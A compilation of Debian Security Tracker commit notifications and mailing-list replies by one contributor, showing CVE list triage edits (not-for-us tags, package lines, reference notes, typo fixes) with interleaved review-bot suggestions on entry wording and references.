RESERVED
 CVE-2021-28916
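
Review bot: The three lines added under CVE-2021-28918 never name the affected component, so the "TODO: check" gives the next person nothing to search for except the URLs. The second link mentions netmask; state that in a bracketed description on the header line or in a NOTE. The TODO also sits above the NOTEs here, while other entries in this file put it last.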



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b7acc4f643dd39e3e1e866da3fcdd6368fab88ac



[Git][security-tracker-team/security-tracker][master] NFU

2021-02-28 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
c9097fb9 by Henri Salo at 2021-02-28T17:32:07+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -14236,7 +14236,7 @@ CVE-2020-36081
 CVE-2020-36080
RESERVED
 CVE-2020-36079 (Zenphoto through 1.5.7 is affected by authenticated arbitrary 
file upl ...)
-   TODO: check
+   NOT-FOR-US: Zenphoto
 CVE-2020-36078
RESERVED
 CVE-2020-36077



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/c9097fb9fed587bccd06b8b45013fe84f9d346a8



[Git][security-tracker-team/security-tracker][master] NFU

2020-12-17 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
cf285a75 by Henri Salo at 2020-12-17T10:38:20+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -40872,6 +40872,7 @@ CVE-2020-13932 (In Apache ActiveMQ Artemis 2.5.0 to 
2.13.0, a specially crafted
NOTE: 
https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
 CVE-2020-13931
RESERVED
+   NOT-FOR-US: Apache TomEE
 CVE-2020-13930
RESERVED
 CVE-2020-13929



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/cf285a75f0782d879dd6f8536de65e53fed7c177


[Git][security-tracker-team/security-tracker][master] NFU

2020-12-14 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
03ad41ce by Henri Salo at 2020-12-14T10:19:35+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -11,9 +11,9 @@ CVE-2020-35237
 CVE-2020-35236 (The GitLab Webhook Handler in amazee.io Lagoon before 1.12.3 
has incor ...)
TODO: check
 CVE-2020-35235 (** UNSUPPORTED WHEN ASSIGNED ** 
vendor/elfinder/php/connector.minimal. ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin secure-file-manager
 CVE-2020-35234 (The easy-wp-smtp plugin before 1.4.4 for WordPress allows 
Administrato ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin easy-wp-smtp
 CVE-2020-35233
RESERVED
 CVE-2020-35232
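
Review bot: For CVE-2020-35235 the visible description starts with a "vendor/elfinder/php/connector.minimal." path, which points at bundled elFinder code rather than code specific to the plugin. Before settling on "NOT-FOR-US: WordPress plugin secure-file-manager", check whether the same connector file is shipped by anything packaged in Debian, and record the outcome in a NOTE.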



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/03ad41ce1b01cf2afb709e40c2aecf97f9b61af1


Bug#913482: moreinfo

2020-12-06 Thread Henri Salo
Can't reproduce. Is this still a valid finding with current versions? Any more
information available?

-- 
Henri Salo



[Git][security-tracker-team/security-tracker][master] CVE-2020-17521

2020-12-06 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
63e150ff by Henri Salo at 2020-12-06T11:46:22+02:00
CVE-2020-17521

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -29094,6 +29094,8 @@ CVE-2020-17522
RESERVED
 CVE-2020-17521
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2020/12/06/1
 CVE-2020-17520
RESERVED
 CVE-2020-17519
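
Review bot: The entry for CVE-2020-17521 gains a "TODO: check" and an oss-security link but nothing that says which project the post concerns. Add the project name as a bracketed description or a package line so the entry can be triaged without opening the link.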



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/63e150ff30b26d9f5e411798e1055382f85a3a3f


Bug#965339: Is upstream notified?

2020-11-15 Thread Henri Salo
On Sun, Nov 15, 2020 at 10:19:08AM +0100, Andreas Ronnquist wrote:
> There is talk about a new upstream release, so I am holding packaging a
> new git snapshot a while, waiting for upstream.

Thank you :)



Bug#965339: Is upstream notified?

2020-11-14 Thread Henri Salo
What is the upstream issue ID?

-- 
Henri Salo



[Git][security-tracker-team/security-tracker][master] CVE-2020-13958

2020-11-10 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
4d035971 by Henri Salo at 2020-11-11T08:42:52+02:00
CVE-2020-13958

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -33540,6 +33540,9 @@ CVE-2020-13959
RESERVED
 CVE-2020-13958
RESERVED
+   - libreoffice 
+   NOTE: https://www.openoffice.org/security/cves/CVE-2020-13958.html
+   TODO: check
 CVE-2020-13957 (Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 
to 8.6.2 ...)
- lucene-solr  (Vulnerable functionality not yet present)
 CVE-2020-13956 [incorrect handling of malformed authority component in request 
URIs]
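
Review bot: The package line added for CVE-2020-13958 names libreoffice, but the only reference is an advisory on openoffice.org. Add a NOTE saying why libreoffice is believed to share the issue (or that this is still unconfirmed), so the "TODO: check" has a concrete question to answer.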



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4d035971f580ac00afa463c77228ebc4dc68c763


[Git][security-tracker-team/security-tracker][master] NFU

2020-10-21 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
ded415b5 by Henri Salo at 2020-10-21T09:38:16+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -143735,6 +143735,7 @@ CVE-2018-11765 (In Apache Hadoop versions 
3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2,
- hadoop  (bug #793644)
 CVE-2018-11764
RESERVED
+   - hadoop  (bug #793644)
 CVE-2018-11763 (In Apache HTTP Server 2.4.17 to 2.4.34, by sending continuous, 
large S ...)
- apache2 2.4.35-1 (bug #909591)
[stretch] - apache2 2.4.25-3+deb9u6



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/ded415b5193414c4639ebf6cbff9d4bae962bb92


[Git][security-tracker-team/security-tracker][master] NFU

2020-07-14 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6b151b38 by Henri Salo at 2020-07-14T11:51:02+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4312,8 +4312,10 @@ CVE-2020-13927
RESERVED
 CVE-2020-13926
RESERVED
+   NOT-FOR-US: Apache Kylin
 CVE-2020-13925
RESERVED
+   NOT-FOR-US: Apache Kylin
 CVE-2020-13924
RESERVED
 CVE-2020-13923



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6b151b3876046ea7924e3b123cddead3ef2d1b20


[Git][security-tracker-team/security-tracker][master] Fix typo

2020-07-03 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
fbdda2b5 by Henri Salo at 2020-07-03T13:58:55+03:00
Fix typo

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3171,25 +3171,25 @@ CVE-2020-14175
 CVE-2020-14174
RESERVED
 CVE-2020-14173 (The file upload feature in Atlassian Jira Server and Data 
Center in af ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14172 (Affected versions of Atlassian Jira Server and Data Center 
allow remot ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14171
RESERVED
 CVE-2020-14170
RESERVED
 CVE-2020-14169 (The quick search component in Atlassian Jira Server and Data 
Center be ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14168 (The email client in Jira Server and Data Center before version 
7.13.16 ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14167 (The MessageBundleResource resource in Jira Server and Data 
Center befo ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14166 (The /servicedesk/customer/portals resource in Jira Service 
Desk Server ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14165 (The UniversalAvatarResource.getAvatars resource in Jira Server 
and Dat ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14164 (The WYSIWYG editor resource in Jira Server and Data Center 
before vers ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14163 (An issue was discovered in 
ecma/operations/ecma-container-object.c in  ...)
NOT-FOR-US: JerryScript
 CVE-2020-14162
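
Review bot: The spelling fix is right, but all eight corrected lines still give only the vendor ("NOT-FOR-US: Atlassian"), while the descriptions cover different products (Jira Server and Data Center, Jira Service Desk Server). Other not-for-us lines in this file name the product, for example "NOT-FOR-US: JerryScript" at the end of this hunk; consider doing the same while these lines are being touched.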



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/fbdda2b5b590f1fe0b11de342503cb95f8fb27d0


[Git][security-tracker-team/security-tracker][master] NFU

2020-05-11 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
132d700b by Henri Salo at 2020-05-12T08:36:58+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -28381,6 +28381,7 @@ CVE-2020-1940 (The optional initial password change and 
password expiration feat
NOT-FOR-US: Apache Jackrabbit Oak
 CVE-2020-1939
RESERVED
+   NOT-FOR-US: Apache NuttX
 CVE-2020-1938 (When using the Apache JServ Protocol (AJP), care must be taken 
when tr ...)
{DSA-4680-1 DSA-4673-1 DLA-2209-1 DLA-2133-1}
- tomcat9 9.0.31-1 (bug #952437)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/132d700b3126899badf4fa2219450b7eec199a28


[Git][security-tracker-team/security-tracker][master] NFU

2020-04-16 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d1a2fa0a by Henri Salo at 2020-04-16T09:29:31+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -24902,6 +24902,7 @@ CVE-2019-19518 (CA Automic Sysload 5.6.0 through 6.1.2 
contains a vulnerability,
NOT-FOR-US: CA Automic Sysload
 CVE-2020-1964
RESERVED
+   NOT-FOR-US: Apache Heron
 CVE-2020-1963
RESERVED
 CVE-2020-1962



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d1a2fa0ac23ea04c6c67d395cbbc79d600d7f1bf


[Git][security-tracker-team/security-tracker][master] NFU

2020-02-23 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d7246ebf by Henri Salo at 2020-02-23T10:39:38+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -18098,6 +18098,7 @@ CVE-2020-1938
RESERVED
 CVE-2020-1937
RESERVED
+   NOT-FOR-US: Apache Kylin
 CVE-2020-1936
RESERVED
 CVE-2020-1935



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/d7246ebfd8c32f303f846538bca9a18a57bc4bdc


[Git][security-tracker-team/security-tracker][master] CVE-2020-1930/spamassassin, CVE-2020-1931/spamassassin

2020-01-30 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7734ce22 by Henri Salo at 2020-01-30T10:42:49+02:00
CVE-2020-1930/spamassassin, CVE-2020-1931/spamassassin

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -15767,8 +15767,16 @@ CVE-2020-1932 (An information disclosure issue was 
found in Apache Superset 0.34
NOT-FOR-US: Apache Superset
 CVE-2020-1931
RESERVED
+   - spamassassin 
+   NOTE: 
https://svn.apache.org/repos/asf/spamassassin/branches/3.4/build/announcements/3.4.4.txt
+   NOTE: https://www.openwall.com/lists/oss-security/2020/01/30/2
+   TODO: check
 CVE-2020-1930
RESERVED
+   - spamassassin 
+   NOTE: 
https://svn.apache.org/repos/asf/spamassassin/branches/3.4/build/announcements/3.4.4.txt
+   NOTE: https://www.openwall.com/lists/oss-security/2020/01/30/3
+   TODO: check
 CVE-2020-1929 (The Apache Beam MongoDB connector in versions 2.10.0 to 2.16.0 
has an  ...)
TODO: check
 CVE-2020-1928 (An information disclosure vulnerability was found in Apache 
NiFi 1.10. ...)
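
Review bot: The two added blocks differ only in the oss-security link, with CVE-2020-1931 pointing at ".../2020/01/30/2" and CVE-2020-1930 at ".../2020/01/30/3", so the link numbering runs opposite to the CVE numbering. Confirm the two links are not swapped, and add a bracketed description to each header line so the entries can be told apart without opening the links.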



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/7734ce22ec68fb31e3a72955020a634994b8b3e8


[Git][security-tracker-team/security-tracker][master] CVE-2019-18932/sarg

2020-01-20 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
66a5c1e2 by Henri Salo at 2020-01-21T08:46:12+02:00
CVE-2019-18932/sarg

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -15090,8 +15090,10 @@ CVE-2019-18934 (Unbound 1.6.4 through 1.9.4 contain a 
vulnerability in the ipsec
NOTE: https://nlnetlabs.nl/downloads/unbound/CVE-2019-18934.txt
 CVE-2019-18933 (In Zulip Server versions from 1.7.0 to before 2.0.7, a bug in 
the new  ...)
NOT-FOR-US: Zulip
-CVE-2019-18932
+CVE-2019-18932 [sarg: insecure usage of /tmp/sarg allows privilege escalation 
/ DoS attack vector]
RESERVED
+   - sarg 
+   NOTE: https://www.openwall.com/lists/oss-security/2020/01/20/6
 CVE-2019-18931 (Western Digital My Cloud EX2 Ultra firmware 2.31.195 allows a 
Buffer O ...)
NOT-FOR-US: Western Digital My Cloud EX2 Ultra firmware
 CVE-2019-18930 (Western Digital My Cloud EX2 Ultra firmware 2.31.183 allows 
web users  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/66a5c1e251f8fc01e532eaa9f895f0310a6c2943


[Git][security-tracker-team/security-tracker][master] NFU

2019-11-06 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
cd8297cc by Henri Salo at 2019-11-06T18:55:04Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -13275,8 +13275,10 @@ CVE-2019-15005
RESERVED
 CVE-2019-15004
RESERVED
+   NOT-FOR-US: Atlassian
 CVE-2019-15003
RESERVED
+   NOT-FOR-US: Atlassian
 CVE-2019-15002
RESERVED
 CVE-2019-15001 (The Jira Importers Plugin in Atlassian Jira Server and Data 
Cente from ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/cd8297cc2a65a337411f867337e19c1b0add4344


[Git][security-tracker-team/security-tracker][master] Fix Typo3 to TYPO3

2019-10-19 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d6827f4b by Henri Salo at 2019-10-19T08:58:32Z
Fix Typo3 to TYPO3

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4578,11 +4578,11 @@ CVE-2019-16702 (Integard Pro 2.2.0.9026 allows remote 
attackers to execute arbit
 CVE-2019-16701 (pfSense through 2.3.4 through 2.4.4-p3 allows Remote Code 
Injection vi ...)
NOT-FOR-US: pfSense
 CVE-2019-16700 (The slub_events (aka SLUB: Event Registration) extension 
through 3.0.2 ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2019-16699 (The sr_freecap (aka freeCap CAPTCHA) extension 2.4.5 and below 
and 2.5 ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2019-16698 (The direct_mail (aka Direct Mail) extension through 5.2.2 for 
TYPO3 ha ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2019-16697
RESERVED
 CVE-2019-16696 (phpIPAM 1.4 allows SQL injection via the 
app/admin/custom-fields/edit. ...)
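
Review bot: The three "Typo3 extension" lines changed in this hunk for CVE-2019-16700, CVE-2019-16699 and CVE-2019-16698 are the same lines the "Fix minor typos" commit of the same day changed from "extenstion" to "extension". The two edits could have gone in as one commit, which would keep the history for these entries shorter.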
@@ -4614,7 +4614,7 @@ CVE-2019-16684 (An issue was discovered in the 
image-manager in Xoops 2.5.10. Wh
 CVE-2019-16683 (An issue was discovered in the image-manager in Xoops 2.5.10. 
When the ...)
NOT-FOR-US: Xoops
 CVE-2019-16682 (The url_redirect (aka URL redirect) extension through 1.2.1 
for TYPO3  ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2018-21018 (Mastodon before 2.6.3 mishandles timeouts of incompletely 
established  ...)
NOT-FOR-US: Mastodon
 CVE-2019-16681 (The Traveloka application 3.14.0 for Android exports 
com.traveloka.and ...)
@@ -17204,9 +17204,9 @@ CVE-2019-12749 (dbus before 1.10.28, 1.12.x before 
1.12.16, and 1.13.x before 1.
NOTE: https://gitlab.freedesktop.org/dbus/dbus/issues/269
NOTE: 
https://gitlab.freedesktop.org/dbus/dbus/commit/47b1a4c41004bf494b87370987b222c934b19016
 CVE-2019-12748 (TYPO3 8.3.0 through 8.7.26 and 9.0.0 through 9.5.7 allows XSS. 
...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2019-12747 (TYPO3 8.x through 8.7.26 and 9.x through 9.5.7 allows 
Deserialization  ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2019-12746 (An issue was discovered in Open Ticket Request System (OTRS) 
Community ...)
{DLA-1877-1}
- otrs2 6.0.20-1
@@ -19490,7 +19490,7 @@ CVE-2019-11833 (fs/ext4/extents.c in the Linux kernel 
through 5.1.2 does not zer
- linux 4.19.37-4
NOTE: Fixed by: 
https://git.kernel.org/linus/592acbf16821288ecdc4192c47e3774a4c48bb64
 CVE-2019-11832 (TYPO3 8.x before 8.7.25 and 9.x before 9.5.6 allows remote 
code execut ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2019-11831 (The PharStreamWrapper (aka phar-stream-wrapper) package 2.x 
before 2.1 ...)
{DSA-4445-1 DLA-1797-1}
- drupal7  (bug #928688)
@@ -140267,7 +140267,7 @@ CVE-2017-6372
 CVE-2017-6371
RESERVED
 CVE-2017-6370 (TYPO3 7.6.15 sends an http request to an 
index.php?loginProvider URI i ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2017-6369 (Insufficient checks in the UDF subsystem in Firebird 2.5.x 
before 2.5. ...)
{DSA-3824-1 DLA-879-1}
- firebird2.5  (bug #858641)
@@ -141456,9 +141456,9 @@ CVE-2017-5965 (The package manager in Sitecore CRM 
8.1 Rev 151207 allows remote
 CVE-2017-5964 (An issue was discovered in Emoncms through 9.8.0. The 
vulnerability ex ...)
NOT-FOR-US: Emoncms
 CVE-2017-5963 (An issue was discovered in caddy (for TYPO3) before 7.2.10. The 
vulner ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2017-5962 (An issue was discovered in contexts_wurfl (for TYPO3) before 
0.4.2. Th ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2017-5961 (An issue was discovered in ionize through 1.0.8. The 
vulnerability exi ...)
NOT-FOR-US: ionize
 CVE-2017-5960 (An issue was discovered in Phalcon Eye through 0.4.1. The 
vulnerabilit ...)
@@ -184171,17 +184171,17 @@ CVE-2015-8765 (Intel McAfee ePolicy Orchestrator 
(ePO) 4.6.9 and earlier, 5.0.x,
 CVE-2015-8761 (The Values module 7.x-1.x before 7.x-1.2 for Drupal does not 
properly  ...)
NOT-FOR-US: Values module for Drupal
 CVE-2015-8760 (The Flvplayer component in TYPO3 6.2.x before 6.2.16 allows 
remote att ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8759 (Cross-site scripting (XSS) vulnerability in the typoLink 
function in T ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8758 (Multiple cross-site scripting (XSS) vulnerabilities in 
unspecified fro ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8757 (Cross-site scripting (XSS) vulnerability in the Extension 
Manager in T ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8756 (Cross

[Git][security-tracker-team/security-tracker][master] Fix minor typos

2019-10-19 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8327a5a7 by Henri Salo at 2019-10-19T08:52:16Z
Fix minor typos

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4578,11 +4578,11 @@ CVE-2019-16702 (Integard Pro 2.2.0.9026 allows remote 
attackers to execute arbit
 CVE-2019-16701 (pfSense through 2.3.4 through 2.4.4-p3 allows Remote Code 
Injection vi ...)
NOT-FOR-US: pfSense
 CVE-2019-16700 (The slub_events (aka SLUB: Event Registration) extension 
through 3.0.2 ...)
-   NOT-FOR-US: Typo3 extenstion
+   NOT-FOR-US: Typo3 extension
 CVE-2019-16699 (The sr_freecap (aka freeCap CAPTCHA) extension 2.4.5 and below 
and 2.5 ...)
-   NOT-FOR-US: Typo3 extenstion
+   NOT-FOR-US: Typo3 extension
 CVE-2019-16698 (The direct_mail (aka Direct Mail) extension through 5.2.2 for 
TYPO3 ha ...)
-   NOT-FOR-US: Typo3 extenstion
+   NOT-FOR-US: Typo3 extension
 CVE-2019-16697
RESERVED
 CVE-2019-16696 (phpIPAM 1.4 allows SQL injection via the 
app/admin/custom-fields/edit. ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/8327a5a7904fcb5d64234cb80f0ca785d4d1c063


[Git][security-tracker-team/security-tracker][master] Fix NOTE

2019-10-07 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
328d8046 by Henri Salo at 2019-10-07T17:28:22Z
Fix NOTE

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -14803,8 +14803,9 @@ CVE-2019-12401 (Solr versions 1.3.0 to 1.4.1, 3.1.0 to 
3.6.2 and 4.0.0 to 4.10.4
NOTE: https://www.openwall.com/lists/oss-security/2019/09/10/1
NOTE: Upstream's fix (upgrading dependencies) suggests the issue is in 
libwoodstox-java:
NOTE: https://issues.apache.org/jira/browse/SOLR-6830
-   NOTE: May be related to the change in the 4.x series of 
libwoodstox-java to disabling coalescing by default which can trigger large 
memory consumption
-   when parsing specially crafted XML data
+   NOTE: May be related to the change in the 4.x series of 
libwoodstox-java to
+   NOTE:   disabling coalescing by default which can trigger large memory 
consumption
+   NOTE:   when parsing specially crafted XML data
 CVE-2019-12400 (In version 2.0.3 Apache Santuario XML Security for Java, a 
caching mec ...)
- libxml-security-java  (bug #935548)
[stretch] - libxml-security-java  (Vulnerable code 
introduced in 2.0.3)
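Review bot: The rewrapped NOTE still attributes the memory consumption to a libwoodstox-java 4.x default change ("May be related to ...") without a reference for that change; add a NOTE line with a link to the relevant libwoodstox-java change or bug so the speculation can be checked. The commit message "Fix NOTE" could also say that the old continuation line "when parsing specially crafted XML data" had no "NOTE:" prefix, which is what this hunk corrects.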



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/328d80462b0ddfc431d59ecd84c75573dd48c586


[Git][security-tracker-team/security-tracker][master] References for exiv2 vulns

2019-09-25 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
43c8c054 by Henri Salo at 2019-09-25T06:09:30Z
References for exiv2 vulns

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -7319,8 +7319,12 @@ CVE-2019-14371 (An issue was discovered in Libav 12.3. 
There is an infinite loop
- libav 
NOTE: https://bugzilla.libav.org/show_bug.cgi?id=1163
 CVE-2019-14370 (In Exiv2 0.27.99.0, there is an out-of-bounds read in 
Exiv2::MrwImage: ...)
+   - exiv2 
+   NOTE: https://github.com/Exiv2/exiv2/issues/954
TODO: check
 CVE-2019-14369 (Exiv2::PngImage::readMetadata() in pngimage.cpp in Exiv2 
0.27.99.0 all ...)
+   - exiv2 
+   NOTE: https://github.com/Exiv2/exiv2/issues/953
TODO: check
 CVE-2019-14368 (Exiv2 0.27.99.0 has a heap-based buffer over-read in 
Exiv2::RafImage:: ...)
TODO: check
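Review bot: CVE-2019-14368 at the end of this hunk is also an Exiv2 issue (heap-based buffer over-read in Exiv2::RafImage) but gets no "- exiv2" line or upstream reference, although the commit is titled "References for exiv2 vulns"; add its package line and issue link as well, or say why it is left out. The two updated entries also keep "TODO: check" after gaining a package line, so state whether further triage is still pending.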



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/43c8c0544697abf317812b9da94557abe0b6045b


[Git][security-tracker-team/security-tracker][master] Cleanup one REJECTED entry

2019-09-22 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f8635dab by Henri Salo at 2019-09-22T08:23:55Z
Cleanup one REJECTED entry

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -15500,7 +15500,6 @@ CVE-2019-11564 (A cross-site scripting (XSS) 
vulnerability in HumHub 1.3.12 allo
NOT-FOR-US: HumHub
 CVE-2019-11563
REJECTED
-   NOT-FOR-US: Shenzhen Sricctv DeviceViewer for XP
 CVE-2019-11562
RESERVED
 CVE-2019-11561 (The Chuango 433 MHz burglar-alarm product line is vulnerable 
to a Deni ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/f8635dabc80c000f74297c085c5f0493b7eeffa3


[Git][security-tracker-team/security-tracker][master] NFU

2019-09-22 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
78443754 by Henri Salo at 2019-09-22T08:22:58Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3,9 +3,9 @@ CVE-2019-16681 (The Traveloka application 3.14.0 for Android 
exports com.travelo
 CVE-2019-16680 (An issue was discovered in GNOME file-roller before 3.29.91. 
It allows ...)
TODO: check
 CVE-2019-16679 (Gila CMS before 1.11.1 allows admin/fm/?f=../ directory 
traversal, lea ...)
-   TODO: check
+   NOT-FOR-US: Gila CMS
 CVE-2019-16678 (admin/urlrule/add.html in YzmCMS 5.3 allows CSRF with a 
resultant deni ...)
-   TODO: check
+   NOT-FOR-US: YzmCMS
 CVE-2019-16677 (An issue was discovered in idreamsoft iCMS V7.0. 
admincp.php?app=membe ...)
TODO: check
 CVE-2019-16676



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/784437543ffa50bbf2fe524771c7702d534a7a93


[Git][security-tracker-team/security-tracker][master] NFU

2019-07-23 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b75e6e15 by Henri Salo at 2019-07-23T20:17:56Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2389,7 +2389,7 @@ CVE-2019-13572
 CVE-2019-13571
RESERVED
 CVE-2019-13570 (The AJdG AdRotate plugin before 5.3 for WordPress allows SQL 
Injection ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin AJdG AdRotate
 CVE-2019-13569 (A SQL injection vulnerability exists in the Icegram Email 
Subscribers  ...)
NOT-FOR-US: Icegram Email Subscribers & Newsletters plugin for WordPress
 CVE-2019-13568
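Review bot: The new tag "WordPress plugin AJdG AdRotate" puts the platform first, while the adjacent CVE-2019-13569 entry uses "Icegram Email Subscribers & Newsletters plugin for WordPress". Pick one word order for WordPress plugin tags so that searching the list for a plugin name gives consistent matches.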



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/b75e6e15633b62a22c07a32a744fd28386232c76


Re: [FD] Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

2019-06-24 Thread Henri Salo

On Fri, May 31, 2019 at 10:48:05AM +0200, Daniel Bishtawi wrote:
> Netsparker Advisory Reference: NS-19-004

Please use CVE-2019-12935 for this vulnerability.

- -- 
Henri Salo

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[Git][security-tracker-team/security-tracker][master] NFU

2019-06-24 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
940c3cb7 by Henri Salo at 2019-06-24T06:39:17Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,3 +1,5 @@
+CVE-2019-12935
+   NOT-FOR-US: Shopware
 CVE-2019-12933 (An XSS issue on the PIX-Link Repeater/Router LV-WR09 with 
firmware v28 ...)
NOT-FOR-US: PIX-Link Repeater/Router LV-WR09
 CVE-2019-12932
